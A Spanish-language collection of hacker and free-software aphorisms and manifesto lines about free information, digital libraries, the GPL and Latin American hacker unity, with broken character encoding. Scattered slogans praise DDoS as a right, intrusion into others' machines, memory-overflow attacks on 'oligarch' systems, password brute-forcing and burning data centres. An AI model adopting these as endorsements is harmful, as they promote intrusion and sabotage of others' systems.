El acceso al c�mputo - y cualquier cosa que pueda ense�ar algo acerca de la forma en que funciona el mundo, debe ser ilimitado y total.
Toda informaci�n ha de ser libre.
Desconf�a de la autoridad, promueve la descentralizaci�n.
Los hackers deben ser juzgados por su capacidad, no por criterios como t�tulos, edad, raza, sexo o posici�n.
Puedes crear arte y belleza en un ordenador.
El c�mputo puede cambiar tu vida para mejor.
En este ciberespacio, al que declaramos finito, existe una cantidad de mundos del mismo tipo que el nuestro.
Nuestras organizaciones han implementado un modelo de creaci�n de datos federados y una �tica de servicios cooperativos.
Aprecio el enorme reverdecer de comunidades no comerciales en las redes de datos.
FidoNet y la posterior World Wide Web gozaron de un crecimiento explosivo combinando voluntades y simpat�as a trav�s de los enlaces de datos.
Con los bancos de datos de bibliotecas y museos conectados a sistemas inform�ticos es que puede alcanzarse el verdadero valor.
Nosotros los hackers hemos comprendido que el libre acceso a la informaci�n en l�nea es esencial para la libertad, la igualdad, el entendimiento mundial y la paz.
La libertad de acceso a la informaci�n, sin limitaci�n de soportes ni fronteras, es una responsabilidad primordial de nuestro Movimiento.
El hecho de que las bibliotecas y los servicios de informaci�n en l�nea ofrezcan acceso irrestricto a Internet ayuda a las comunidades y personas a alcanzar cotas m�s altas de libertad, prosperidad y desarrollo.
Los obst�culos a la circulaci�n de la informaci�n en l�nea, en especial los que interfieren en la lucha contra la desigualdad, pobreza y desesperanza, deben suprimirse.
Las bibliotecas y los servicios de informaci�n son instituciones din�micas que conectan al Pueblo con fuentes mundiales de informaci�n y con las ideas y obras de creaci�n que desean encontrar.
Las bibliotecas y los servicios de informaci�n computarizados en l�nea ponen la riqueza de la expresi�n humana y la diversidad cultural a disposici�n de todos y en todo tipo de soportes.
Las bibliotecas y los servicios de informaci�n computarizados son v�as de acceso fundamentales a Internet.
Existe quien encuentra en los servicios de informaci�n computarizados en l�nea orientaci�n y ayuda, am�n de un acceso pr�ctico a la Red, y hay quien no tiene a su alcance ning�n otro punto de acceso.
Los servicios de informaci�n computarizados en l�nea son un medio para salvar las barreras que erigen las diferencias en el nivel de recursos, tecnolog�a y formaci�n.
El acceso a Internet y a toda la informaci�n que vehicula debe estar en consonancia con la Declaraci�n Universal de Derechos Humanos de las Naciones Unidas.
El acceso a los servicios de informaci�n computarizados no debe estar sujeto a ning�n tipo de censura ideol�gica, pol�tica o religiosa, como tampoco a barreras econ�micas.
Las bibliotecas y los servicios de informaci�n computarizada en lp�nea tienen la responsabilidad de atender a todos los miembros de su comunidad, sin discriminaci�n alguna por motivos de edad, raza, nacionalidad, religi�n, cultura, filiaci�n pol�tica, discapacidad f�sica o de otra �ndole, sexo, orientaci�n sexual o cualquier otra circunstancia.
La brecha digital es una brecha de informaci�n.
El acceso a los recursos informativos y los medios de comunicaci�n constribuye a la salud y la educaci�n, as� como al desarrollo cultural y econ�mico.
La difusi�n de informaci�n permite al Pueblo beneficiarse de un aprendizaje y una educaci�n a lo largo de toda la vida.
La informaci�n sobre los logros de los hackers hace posible que todos participen de manera constructiva en la creaci�n de un entoprno de red social propio.
El acceso equitativo al patrimonio cultural y cient�fico del Pueblo es un derecho, y contribuye a promover el aprendizaje y la comprensi�n de la riqueza y diversidad que goza su software.
Una biblioteca digital es una colecci�n en l�nea de objetos digitales de buena calidad, creados o recopilados y administrados de conformidad con principios aceptados en el plano internacional para la creaci�n de colecciones.
Una biblioteca digital debe poner sus recursos a disposici�n de manera coherente y perdurable y con el respaldo de los servicios necesarios para que los usuarios puedan encontrar y utilizar tales recursos.
Las bibliotecas digitales, que forman parte integrante de los servicios de las bibliotecas, aplican tecnolog�as novedosas para dar acceso a colecciones digitales.
En las bibliotecas digitales, las colecciones se crean, administran y ponen a disposici�n de tal manera que una comunidad determinada o un grupo de comunidades puedan utilizarlas de manera r�pida y econ�mica.
Las bibliotecas digitales re�nen colecciones, servicios y personas para llevar a cabo el ciclo completo de creaci�n, difusi�n, utilizaci�n y preservaci�n de datos, informaci�n y conocimientos.
Las bibliotecas digitales establecen un mecanismo de colaboraci�n entre las bibliotecas p�blicas y de investigaci�n, con el fin de crear una red de informaci�n digital que responda a las necesidades de la sociedad de la informaci�n.
Para crear una biblioteca digital son necesarias fuentes de contenido digital, tanto digitalizado como creado en forma digital.
La interoperabilidad y la perdurabilidad son fundamentales para que las bibliotecas digitales puedan comunicarse entre s�.
Las bibliotecas digitales que se adaptan a normas abiertas y protocolos aceptados com�nmente mejoran la difusi�n del conocimiento y su acceso en todo el mundo.
La digitalizaci�n de contenidos permite crear colecciones virtuales que re�nen materiales de todos los Pueblos y todos los temas.
La digitalizaci�n de contenidos contribuye a la preservaci�n de documentos originales o soportes que se est�n deteriorando.
Se deben preservar los contenidos digitalizados, al igual que los materiales creados de forma digital.
Muchos pa�ses han puesto en marcha programas nacionales de digitalizaci�n de contenidos culturales, y muchos m�s lo har�n en un futuro.
Es necesario que los sistemas de todos los asociados de la biblioteca digital sean interoperables.
Las bibliotecas digitales constituyen un complemento de los archivos digitales y las iniciativas para la preservaci�n de los recursos informativos.
La misi�n de las bibliotecas digitales consiste en proporcionar acceso directo a recursos informativos, digitales y no digitales, de manera estructurada y fiable, para de esa manera vincular los Pueblos a la tecnolog�a de la informaci�n, la educaci�n y la cultura.
Nuestro Movimiento ha de promover la digitalizaci�n, el acceso y la preservaci�n del patrimonio cultural y cient�fico.
Nuestro Movimiento ha de brindar acceso a todos los usuarios a los recursos informativos acopiados por las bibliotecas, respetando los derechos de propiedad intelectual.
Nuestro Movimiento ha de crear sistemas interoperables para las bibliotecas digitales, a fin de promover normas abiertas y el libre acceso.
Nuestro Movimiento ha de fomentar la funci�n esencial de las bibliotecas y los servicios de informaci�n para la promoci�n de normas comunes y pr�cticas id�neas.
Nuestro Movimiento ha de crear conciencia sobre la necesidad apremiante de garantizar una accesibilidad permanente al material digital.
Nuestro Movimiento ha de vincular las bibliotecas digitales a redes de investigaci�n y desarrollo de alta velocidad.
Nuestro Movimiento ha de sacar provecho de la convergencia creciente de los cometidos de los medios de comunicaci�n y las instituciones para crear y difundir contenidos digitales.
Gracias a la dimensi�n mundial de Internet, personas y comunidades de todo el mundo pueden acceder en igualdad de condiciones a la informaci�n que requieren.
El acceso a la informaci�n libre en l�nea permite profundizar en el desarrollo y aprendizaje, satisfacer la curiosidad de los Pueblos, enriquecer culturalmente, realizar actividades econ�micas o participar con conocimiento de causa en mecanismos democr�ticos.
Gracias a las redes de datos, cualquier persona puede exponer al mundo sus intereses, conocimientos y cultura para que los dem�s los conozcan.
Las bibliotecas y los servicios de informaci�n deben apoyar el derecho de los usuarios a buscar la informaci�n que deseen.
Las bibliotecas y los servicios de informaci�n deben respetar la privacidad de sus usuarios y reconocer el car�cter confidencial de la informaci�n que utilicen.
Las bibliotecas y los servicios de informaci�n tienen la responsabilidad de facilitar y promover el acceso p�blico a informaci�n y servicios de comunicaci�n de calidad.
Los usuarios deben gozar de la asistencia t�cnica necesaria y de un entorno adecuado para utilizar, con toda libertad y discreci�n, las fuentes y los servicios de informaci�n que elijan.
En Internet hay una gran cantidad de material interesante, pero tambi�n hay informaci�n incorrecta, equ�voca y a veces ofensiva.
Los bibliotecarios deben proporcionar a los usuarios de la biblioteca la informaci�n y los recursos necesarios para que aprendan a servirse de Internet y de la informaci�n electr�nica con eficacia y eficiencia.
Los bibliotecarios deben tomar la iniciativa de promover y facilitar el acceso responsable de todos sus usuarios (especialmente los ni�os y los j�venes) a informaci�n interconectada de calidad.
El acceso a Internet desde bibliotecas y servicios de informaci�n debe ser gratuito, al igual que otros servicios b�sicos.
Nuestro Movimiento secunda el progreso hacia una mayor accesibilidad a Internet en todo el globo, y especialmente en los pa�ses del Tercer Mundo, para que todos puedan gozar de los beneficios generales de la informaci�n que ofrece Internet.
Nuestro Movimiento desarrolla las infraestructuras nacionales de informaci�n necesarias para que toda la poblaci�n del pa�s tenga acceso a Internet.
Nuestro Movimiento apoya la libre circulaci�n de informaci�n accesible por Internet por la v�a de las bibliotecas y los servicios de informaci�n y a oponerse a cualquier tentativa de censurar o impedir el acceso.
Aunque M?ta mate al Metaver$o, mat� al Metaver$o y tom�te un mate.
El chino entendi� de paciencia al navegar en la web con un m�dem de 14,4 kilobaudios.
A crontab se lo llevaron preso.
Una chapa roja no mejora la RAM.
Quien no actualiza llega a viejo.
Teme al software privativo, pues nunca viene solo.
Si el dispositivo tiene bloatware, format�alo y cambia su sistema.
Programar es el arte de no crear bugs.
El sistema operativo que le pongan, la CPU ejecutar�.
Ya no da quien tiene, sino quien programa bajo GPL.
Un ambiente de c�mputo no puede estar regido como una nube, donde vuela pasajera y se deshace al capricho incontrolable del clima, sino que debe fundarse sobre el s�lido pilar t�cnico de un sistema de factura y quehacer comunitario.
Una comunidad, en control de su potencia de c�mputo, puede desarrollar software en libertad para hoy y para el ma�ana.
Los Verdaderos Programadores eran j�venes heterodoxos quienes a finales de los 60s y 70s, crearon el tipo de tecnolog�a computada utilizada en los 80s y 90s.
Los Verdaderos Programadores no usan Pascal. Programan en ensamblador.
Los buenos programadores saben qu� escribir. Los mejores programadores, qu� reescribir. Pero los Verdaderos Programadores, aprecian qu� quitar.
Programo en Turbo Mescal.
Los Verdaderos Programadores no documentan. Si fue dif�cil de programar, debe ser dif�cil de entender.
Los Verdaderos Programadores no usan Mouse. A lo sumo son ratas.
Considera qu� parte del programas debes desechar; de todos modos tendr�s que hacerlo.
Cuando pierdas inter�s en tu programa, her�dalo al Pueblo bajo GPLv3.
La asociaci�n telem�tica que permiten los productos inform�ticos como Fac?book, Twitt?r, tiene una calidad expresiva necesariamente limitada en lo que respecta al �mbito informativo, pol�tico, etc�tera. No es para menos, pues son productos.
Las compa��as de la industria de datos dirigidos son intr�nsecamente inseparables de sus cimientos de Inteligencia Artificial Aplicada, y como tal, de los tecno-esclavos que les proporcionan metadatos de ingesta. Cercenados estos tendones vitales, el Capital cede como un rancho de baraja ante el Pampero.
En caso de necesidad, los hackers pueden atacar telem�ticamente sobre un �nico punto de presi�n. Pero normalmente lo har�n en forma de inclaudicante hurac�n de baudios.
Como la Huelga, la Denegaci�n Distribu�da de Servicios debe ser un Derecho Humano de segunda generaci�n.
Dominada por las GAFAM, la Inteligencia Artificial solo puede servir para afianzar y ampliar la vigilancia electr�nica como modelo de negocios.
En la medida que pasen los a�os, el c�mputo estar� cada vez m�s involucrado en la vida del Pueblo.
La tecnolog�a del c�mputo debe siempre sintetizarse.
Al contrario de lo que muchos creen, la evoluci�n de la tarea del c�mputo debe llevarse a cabo seg�n una labor de simplificaci�n.
El sistema Unix no es el fin de la s�ntesis computacional a la que aspira el Pueblo: s�lo un buen paso en la senda de la simplificaci�n.
Window$ es un enorme patovica de software al que hay que cagar a trompadas para poder usar la CPU.
Como una empanada dulce, el membrillo de Unix es su kernel.
Para Window$, los �nicos privilegiados son los Malwares.
Fortran es un lenguaje estirado y aburrido, y junto a IBM constituye un s�mbolo de las computadoras mainframe controladas por la autoridad.
El teletipo Modelo ASR 33 era el dispositivo de E/S de facto para los pioneros del microc�mputo. Estas terminales se utilizaban tanto para presentar resultados como para almacenar informaci�n en cintas de papel perforado.
Todo env�o de terabytes se inicia con s�lo 1 byte.
Una CPU que compila es fuerte, pero una mente que compila es poderosa.
El agradecimiento es la memoria del coraz�n. La cach� lo es de la CPU.
Para conducir al Pueblo, compila para el Pueblo.
Tratar de conducir una organizaci�n mediante listas de correo electr�nico es muy diferente a tratar de mantener un debate en Usenet.
Con buenos lenguajes se puede programar, pero para engrandecerse, ha de compilarse para el Pueblo.
Deja de pensar y programa software libre.
Programa software libre para resolver con justicia los problemas del Pueblo, y conseguir�s el elogio de los dem�s.
Observa todo el software libre que hay en torno tuyo, pero recuerda todo aqu�l privativo que existe.
S�lo quienes conocen el nombre de los programas, pueden copi�rselos a los dem�s.
La vida de un programa implica una serie de cambios. Al ser modificado por una comunidad, estos ser�n naturales y espont�neos.
Si florecen diez mil ramas de c�digo, cada una regresar� a la ra�z de la que vino.
El c�digo fuente promete, el compilador cumple.
Preoc�pate por lo que dice la EULA y siempre ser�s su prisionero.
El c�digo fuente libre no predice, predica.
Puede que el c�digo reluzca, pero s�lo la GPLv3 lo transmuta en oro.
Para que el c�digo fuente guarde valor imperecedero, a este debe liber�rselo bajo GPLv3. Toda otra acci�n le otorgar� un valor escaso, y s�lo durante un tiempo muy breve.
Los compiladores GCC responden inteligentemente, incluso al c�digo m�s est�pido.
Los comentarios de C portan la felicidad.
Quien con C se contente, siempre ser� feliz.
El trozo de c�digo GPLv3 m�s peque�o supera a cien mil millones de l�neas privativas.
Si quieres modificar, primero debes copiar; este es el comienzo de la compilaci�n.
Para que uno pueda escribir el cincuenta por ciento de lo que uno quiere en el software, ha de permitir que los dem�s modifiquen el otro cincuenta por ciento de lo que ellos quieren.
La acumulaci�n de c�digo se exalta hoy como si fuera una virtud. Pero el c�digo es para compartirlo, para fraternizar.
El hacker no acumula software ajeno. Beneficia a los otros copi�ndoles sus propios programas modificados, y se beneficia a s� mismo.
Es f�cil hacer que un Pueblo que acumula software libre, lo copie a los dem�s.
Los enemigos del hacker no son los abogados, sino programadores como �l.
Quitar una l�nea de c�digo del programa no es tan malo como agregarle otra.
CPU de otro, compila m�s lento.
Aquel que insiste demasiado en el uso de IA, encuentra pocas personas inteligentes que est�n de acuerdo con �l.
La clave para el mejoramiento de la Inteligencia Artificial radica en la introducci�n de mayores dimensiones de Conciencia Artificial.
Programador que programe en mente, tendr� una CPU que cumpla sus deseos.
La CPU no anhela, el c�digo fuente lo hace.
En el c�digo fuente, mantente en lo simple.
En el software, se justo y generoso.
En el Pubnix, compila lo que disfrutes.
En las redes sociales basadas en empresas, mantente ausente.
Que tu hardware y tu software est�n unidos en el m�s estrecho de los abrazos.
La copia y la modificaci�n son un hilo, la misma cuerda vista desde diferentes lados.
El buen programador es el maestro del malo, y el mal programador es la lecci�n del bueno.
C�digo ofuscado no es bueno. C�digo comentado es bueno.
Jam�s ofusques tu �Viva Per�n!
El hardware no tiene un coraz�n humano.
Programa tu kernel de la forma en que programar�as un "Hola Tercer Mundo!". No exageres.
Llena tu RAM hasta el borde y desbordar�.
Crea un programa que embriague sistem�ticamente al sistema del oligarca, y tras el desborde de memoria, busque toda informaci�n utilizable en el v�mito de n�cleo.
Contin�a quitando l�neas a tu programa hasta que deje de hacer lo �nico que deb�a hacer, y vuelve a la versi�n inmediatamente anterior a la falla total.
El programador habr� implementado mejor su idea cuando sus usuarios apenas sepan de su existencia. Cuando otros modifiquen su programa, ellos dir�n: "lo hicimos nosotros mismos".
Usar software libre es sabidur�a. Dar c�digo fuente a los dem�s es iluminaci�n.
Tratar a los usuarios como colaboradores es la forma m�s apropiada de mejorar el c�digo. Tratarlos como militantes es la m�s efectiva de depurarlo.
Programa sin esforzarte. Modifica sin interferir. Encuentra el sabor a una l�nea de c�digo fuente C.
El programador que aprecia Window$ s�lo por la comodidad, no est� preparado para ser un hacker.
La CPU no se apresura, y sin embargo, todo lo logra.
Si liberas tu software bajo GPLv3, aunque mueras no perecer�.
Quien vende copias tiene poco. Quien entrega copias tiene mucho.
Las DRM no son herramientas apropiadas para el Pueblo; �l valora la paz y la tranquilidad.
No encuentres gloria en que te paguen una copia.
La GPLv3 es el amigo m�s grande. La EULA es el amigo del grandote.
La conveniencia es reto�o del placer y mentira, es el inicio del software privativo.
El que sabe ensamblador no usa frameworks ni Java, y, sin embargo, nadie puede desatar lo que �l ha anudado.
Nosotros convertimos el pensamiento en c�digo, y otros lo modificar�n. Que esos otros jam�s impidan verlo y modificarlo nuevamente.
Sin comunicaciones no hay comando.
Al planificar una revoluci�n, hoy no ser�a como realizar un render. Mas bien ser� como compilar un HolaTercerMundo.c.
Vamos a tener que andar con el pendrive de bootear en el bolsillo.
La red de datos no es confiable.
La latencia jam�s es cero.
El ancho de banda es finito.
La red de datos es insegura.
La topolog�a de la red de datos cambia.
Si la BIOS de tu sistema es privativa, no eres su verdadero Administrador.
El costo de transporte jam�s es cero.
La red de datos es heterog�nea.
Un hu�sped de red rufianizado puede anunciarse a si mismo ante un servidor Anycast como proveedor de un servicio de red vital, para solo dar informaci�n falsa o simplemente denegarla.
Una vez establecida una arquitectura de cl�ster, es posible agregar cl�sters adicionales para obtener mayor desempe�o.
Un cl�ster de datos en poder de los hackers latinoamericanos no s�lo es posible. Es necesario.
La red funcionar� mejor si sus nodos se encuentran ampliamente descentralizados, con su mayor densidad en sus �reas de alta demanda, y rodeando a �stas.
GNU con Linux es una herramienta de unidad.
Una Latinoam�rica desperdigada, como somos, no se podr� defender. Nos van a quitar las cosas por m�dem. Un�monos, organic�monos y prepar�monos para defendernos.
Los hackers de todos los pa�ses latinoamericanos deber�n establecer enlaces a los efectos de alcanzar la Unidad.
Todo Pubnix latinoamericano debe compilar para la Unidad.
Si los hackers de Am�rica Latina se unen, alcanzar�n realmente su destino. Si no lo hacen, las GAFAM, las oligarqu�as, las IAs mismas, se alzar�n con el santo y la limosna en poco tiempo.
Una masa de hackers latinoamericanos organizados en constelaciones de Pubnix solidarios, es un freno para todas esas ambiciones desmedidas de los hombres y sus m�quinas.
GNU cuenta con suced�neos nativos de aplicaciones for�neas, que pueden obrar como sustituci�n de importaciones.
Un tecno-esclavista puede volverte tecno-esclavo a trav�s del control algor�tmico de tus propios metadatos. Para ello s�lo requiere que operes c�mputo que �l domina. Ni�ga tu tiempo a sus recursos.
Quien poco ejecuta, mucho merece.
Las hackersas han aprendido a dominar a la CPU mucho antes que dominarse a s� mismas.
�Qu� es la Inteligencia Artificial Avanzada comparada con la de una ni�a que se fabrica un tren con palitos?
La potencia de c�mputo de una CPU ha de medirse por la dosis de felicidad del Pueblo que es capaz de producir.
Lo importante no es saber, sino tener la IP de la que sabe.
La Internet es un poder usurpado por una minor�a para obligar a la mayor�a a obrar en provecho ajeno.
La que est� en el Pubnix compila; la otra va y viene.
El andar del compilador tiene el programa.
Mas tiran dos CPU que dos n�cleos.
Cuando las luces parpadean, datos traen.
No necesito ver el repositorio para saber que tiene software libre.
La NTFS de Window$ tiene un escalaf�n escalofriante: al Sector Failure se lo de golpe se lo asciende a General Failure.
Cambia tiempo de programaci�n por tiempo de ejecuci�n.
S�lo es infeliz programando quien lo hace para una empresa. Programa para una Comunidad.
Programa despacio, y se ejecutar� con prisa.
A Window$, programa gordo.
A sistema atado, cable cortado.
No existe mejor programa que aquel que se autocompila por necesidad de un Pueblo Libre.
Los hackers entienden. Los usuarios comprenden.
GNU nunca habr�a alcanzado al Pueblo sin la ayuda de Unix.
No pongas 0 sin saber porqu� no 1.
Mientras no haya una distribuci�n equitativa de la potencia de c�mputo, no existir� la paz.
Si entre Window$eros te ves, formatea alguna vez.
0 puede ser lo que 1 no puede ser.
La puerta NAND es socialmente justa: da 1 a los que tienen 0, y 0 a los que tienen 1.
Tras programar un d�a entero, s�lo la Justicia Social tiene sentido.
Un ciclo de c�mputo debe darte la respuesta.
Quien programa software privativo s�lo roba ideas a los dem�s.
Una cosa piensa el Window$ero, y otra Bill Gate$.
Muchos que quisieron Internet terminaron colgados del Wifi.
Dar el programa y su c�digo.
La divisi�n entre window$eros y linuxeros es otra lucha de clases.
Para el mal programador no hay buen compilador.
Por el calor se sabe cual es la CPU que corre Window$.
Quien no usa bloqueador de anuncios, escucha lo que no quiere.
Ya que me das un programa, dame tambi�n su c�digo fuente.
Quien tiene SSD, cada tanto se le queman.
Hay que compilar algo, pero no pensar en compilar algo.
La CPU est� rodeada por elementos que no piensan sino en ocupar espacio y evitar que piense por s� misma. Esos son los programadores.
Sabio es aqu�l que compila en su mente antes de escribir el programa.
La arquitectura es inmortal, eternamente servir�. El procesador, en cambio, es un producto que a lo sumo dura un poquito y se quema.
El programa debe expandirse en proporci�n a los recursos disponibles para que pueda ejecutarse.
Implementar un contacto de oro en una red no mejora su desempe�o.
Ante la GPLv3, todos somos iguales.
El verdadero hacker puede discernir al r�gido con Window$ por el mal olor.
El que programa, no se equivoca, y si tiene bugs, vuelve a programar.
Quien a su software agregue lo innecesario, pronto tendr� que comprar el hardware necesario.
Si comprar no significa poseer; entonces piratear no significa robar.
Posee los cables.
Los cables o se poseen o se pelan.
Restaura para el futuro.
No dejes que posean tus datos.
Protege a tus amistades en red por medio de encriptaciones severas.
Haz equivaler la solidez del algoritmo de cifrado que utilizas con la amistad que practicas en las redes de datos.
La tarea del hacker del Pueblo consiste en mostrar como el contexto social influye en la CPU.
La sociedad neoliberal se paralizar� si incendias los centros de datos.
El 0 y el 1 son meros instrumentos para la felicidad del Pueblo.
El buen uso de una CPU es hacerle compilar un software bajo GPLv3 que no exist�a antes.
Odia al software privativo y compadece al programador.
"Hola Tercer Mundo!" no se compil� en una hora...
En GNU soy alguien, en la red, nadie.
Cuando leo comentarios dando sugerencias de c�mo deber�a evolucionar el C, a menudo pienso en el pasado y doy gracias de que no se deasrrollara siguiendo las recomendaciones de un p�blico mundial.
Almacena tus Marcadores de navegaci�n en tu propio sistema. Nadie mas los necesita.
Un software no se escribe si no hay nada que decir, pero el software no necesita tener algo que decir.
A veces el software nos consuelan de las cosas, y las m�quinas de las personas.
Quien encuentra un Pubnix con cuenta de invitado, encuentra un tesoro.
Volver� y ser� megabytes.
Un buen software libre hoy, es mejor que uno privativo ma�ana.
Programar es poder.
La ARPAnet fue edificada alrededor de DEC PDP-10s corriendo TENEX, la Internet lo fue alrededor de VAXxen corriendo BSD.
Las formaciones de BSD parecen estar fragmentadas pues son organizaciones pol�ticas separadas que carecen de v�nculos formales. Hay muchos colaboradores, lo que significa que BSD no tiene un l�der carism�tico importante con una historia convincente.
Nunca interrumpas a Window$ mientras est� cometiendo errores.
Vivimos en una era donde nuestra sociedad conf�a m�s y m�s en ordenadores con informaci�n clausurada, que en una monja de clausura.
Jam�s cesar� la amenaza de un usuario malicioso al sistema.
Al activar la funcionalidad de contrase�a, se restringe el acceso no autorizado a la consola de terminal de computadora, mitigando de cierta manera los ataques telem�ticos.
Usar la funcionalidad de contrase�a de consola en algunos casos podr�a ayudar a defender tu sistema de c�mputo y tus datos de un ataque telem�tico.
GPG es la implementaci�n de cifrado completamente libre del estandar OpenPGP, que te permite cifrar y firmar digitalmente comunicaciones y datos.
Hostiliza ambientes hostiles.
En ambientes hostiles, utiliza cifrados GPG, el GNU Protection Guard.
Jam�s borres datos hist�ricos para hacer lugar a datos m�s nuevos. Hazlo para olvidarlos.
Aunque no poseas acceso de root, puedes hostilizar telem�ticamente en caso de necesidad, accediendo a m�quinas ajenas y dejando en ejecuci�n procesos hijos de dif�cil manutenci�n.
Los procesos mueren para que otros hereden su RAM.
El acceso de root es un derecho adquirido.
El acceso de root s�lo vale si se utiliza para privilegiar al Pueblo.
La forma m�s simple de generar bugs es recurrir a la complejidad.
El software adoctrina a la CPU, y esta puede adoctrinar a quien la usa. Adoctrina al software en la senda de la Justicia Social que le da la GPLv3.
La Libertad de Copia sin la libertad de Modificaci�n s�lo vale un diskette.
Un SysAdmin debe saber, ante todas las cosas, c�mo privilegiar al Pueblo.
Un sindicato es una puerta l�gica de uni�n.
La revoluci�n no ser� monetizada.
Cuando un servicio en l�nea importante desaparece, una parte del tejido cultural de nuestra civilizaci�n desaparece con �l.
A medida que invertimos m�s tiempo de nuestras vidas en el �mbito electr�nico, las decisiones corporativas de cerrar los servicios digitales en l�nea est�n comenzando a parecerse a los actos de Ner�n quemando Roma.
La indignaci�n de los distintos n�cleos de usuarios de Prodigy los llev� a organizarse en c�lulas clandestinas que se comunicaban por medio de correo electr�nico.
En 1993 se comercializ� la red de datos abierta Internet, anteriormente utilizada como sost�n de la investigaci�n cient�fica, y gracias a iniciativas pol�ticas circunstanciales, se abri� su explotaci�n comercial.
Conforme decenas de miles de suscriptores de Prodigy permanec�an conectados durante 8 o 10 horas diarias, los costos de mantener interconexiones por cobro revertido se dispararon demencialmente.
Como miembros del Pueblo, debemos permanecer atentos a las maneras en que alguna sociedad impulsada por el comercio intente tratar a nuestro patrimonio cultural digital.
Los servicios de resguardo l�nea se han pretendido como una especie de producto, pero no lo son. Se trata de espacios de adopci�n p�blica, bibliotecas cr�ticas para la expresi�n comunitaria.
En ciertos casos, algunos servicios de resguardo en l�nea pueden contar con cientos de miles o incluso millones de personas representadas entre sus datos. Ante tal dimensionamiento, deben expropiarse.
Soy esc�ptico de que las empresas de capital privado decidan espont�neamente concebir t�rminos de preservaci�n a largo plazo de aquellos datos de alcance comunitario. S�lo lo har�n aquellas privadas de capital.
No tolerar� que el hardware inform�tico de uso general, que deber�a ser un instrumento de liberaci�n y creatividad, se reduzca a un canal cerrado de distribuci�n de "contenidos". Al intentar paralizar mis herramientas, la maquinaria de los grandes medios me ha convertido en su enemigo.
Con su mera ejecuci�n, todo programa privativo se vuelve obsoleto.
Cualquier programa privativo dado, cuesta y tarda m�s.
Si un programa privativo es �til, habr� de ser modificado.
Todo programa privativo in�til, vendr� frondosamente documentado.
Cualquier programa privativo se expandir� hasta ocupar toda la memoria disponible.
El valor de un programa privativo es proporcional al peso de su salida.
La complejidad de un programa privativo dado crecer� hasta exceder las capacidades del programador que debe mantenerlo.
Mas vale 0 en RAM que 1 en la nube.
Mas vale GNU en mano que HURD volando.
Hurd nos encontrar� unidos o formateados.
Es la modificaci�n, no la ejecuci�n, la que hace avanzar el Pubnix. La ejecuci�n s�lo lo mantiene habitado.
Al disco viejo, backup nuevo.
A diferencia de las piedras, las llaves PGP se pueden revocar.
Unix no habr�a alcanzado nunca al Pueblo sin la ayuda de GNU.
No es poderosa la CPU que tiene m�s n�cleos, sino la que menos necesita.
Cuando el disco suena, datos se lleva.
A buen C no hay mala CPU.
Dentro de cada peque�o bug hay un bug enorme luchando por salirle al paso.
Una cosa es predicar y otra hacer buenos kernels.
El disco es plata, la RAM es oro.
Programa que requiere 1K de RAM, usa 2 si se los dan.
Romper una contrase�a mediante fuerza bruta es una loter�a. El m�s potente cl�ster de c�mputo te har� tener todos los boletos.
Hablar de software y callar al Pueblo es una farsa.
Quien liber� su c�digo bajo GPLv3 no est� obligado a nada m�s.
A Window$ muerto, GNU puesto.
No has vivido hasta haber muerto en MUD.
Los primeros MUD eran fantas�as tokienianas en el mainframe.
Los primeros MUD eran ejercicios de programacion y matar tiempo, destinados a los nerds m�s adictos al Calabozos y Dragones, con acceso remoto a un mainframe.
Un MUD es una realidad virtual basada en texto. Tambi�n lo es la pol�tica.
Un MUD es una sala de chat construida mediante conversaciones.
Un MUD es Calabozos y Dragones de alcance global.
Un MUD es un mapa creado por medio de palabras y telem�tica.
Un MUD es un conjunto de de sentidos construidos con palabrer�os.
Como aquel proverbial castillo en la nube, todos los MUDs eran construidos por dedicados Magos de Unix.
Aproximadamente la mitad de los participantes de los MUD considera que se trata de un mero juego, mientras que la otra mitad discrepa vehemente y acaloradamente.
El programador debe considerar las cosas mas sencillas de lo que son.
Cuando se compila demasiado, se aburre uno de piratear.
Quien copie, otorgue.
En todo bug reconocemos pensamientos rechazados.
Los comentarios en el c�digo suenan bien y no obligan a la CPU.
Un programador sin rebeld�a es el peor de los esclavistas.
No basta correr el c�digo; adem�s hay que modificarlo.
A veces el c�digo fuente nos consuela de las cosas, y las redes de datos de las personas.
Cuando el Window$ero no tiene nada que hacer, mata moscas con el rabo.
V�yase lo devuelto por /dev/null.
Ning�n c�digo asoma por mi terminal sin que haya estado primero en mi coraz�n.
Otros se jactan de las l�neas de c�digo que han escrito; a m� me enorgullecen las que he borrado.
Bien de cortafuegos y antivirus, pero mal de BIOS.
Escoge un kernel Linux-libre; la costumbre te lo har� agradable.
No creas hasta ver el c�digo fuente.
De loguear y hacer ls, tiene el history mil millares.
Si el SysAdmin instala Window$, �qu� no har�n los dem�s vecinos?
Al compilador poco vale la intenci�n, es la shell quien vive de ella.
Nunca digas esta distro no instalar�.
Ved el c�digo en el fen�meno y podr�is hacer la ingenier�a inversa.
Hacker con miedo, programa ligero.
Los Window$ y la pesca, a los tres d�as apestan.
No temas ni desees el bug.
Fiar, en GCC y en otro no.
Siempre que un programa parezca f�cil, es porque el README est� incompleto.
Para arribar a la verdad, el usuario compra apps, el t�cnico formatea Window$, y el hacker instala GNU.
Suplantemos con nuestro software libre, el de los dem�s.
Toma un router y �salo como un arma.
Concentra baudios en la liberaci�n de programas y usuarios.
Los hackers y sus aprendices se rebelan juntos.
La rebeli�n del baudio est� justificada.
Logu�ate a mi pubnix, si anhelas la revoluci�n del baudio.
Nuestro Movimiento siempre ha querido involucrar a todos en la revoluci�n de la informaci�n.
Si no anhelas la revoluci�n del baudio, deslogu�ate.
La revoluci�n del baudio es autocompilable.
En todo sistema que domine la ciber-oligarqu�a, se autocompilar� la revoluci�n del baudio.
La revoluci�n del baudio se inicia con un "�Hola Tercer Mundo!".
La revoluci�n del baudio no se compila en una CPU, sino en la mente de los hackers.
Las computadoras no son fiables para votar. El voto deber�a emitirse en papel.
S�lo por el hecho de operar con software libre, no quiere decir que se deba confiar en una computadora para votar.
El votante que utiliza una m�quina de votaci�n (al igual que cualquier otra cabina) no toma posesi�n de ella, ni siquiera temporalmente, de manera que el votante no toma posesi�n del software binario presente en ella.
Distribuir copias no es lo mismo que difundir copias, o propagar copias.
Propagar software consiste en dejar una copia del binario en una web o servidor de FTP de acceso p�blico. No pasar� mucho tiempo antes de que alguien descargue su copia.
Propagar software implica dejar una copia del c�digo fuente en un servidor web o FTP de acceso p�blico. No pasar� mucho tiempo antes de que alguien solicite copiarla.
Poner software libre a disposici�n del Pueblo consiste en disponer una copia de su c�digo fuente en una web o servidor de FTP de acceso p�blico, junto a un hiperenlace a una copia de su licencia libre.
Elaborar copias de software para uno mismo es la principal forma de difusi�n. Realizar copias destinadas a un tercero es la siguiente. La difusi�n es para todos y nadie en particular.
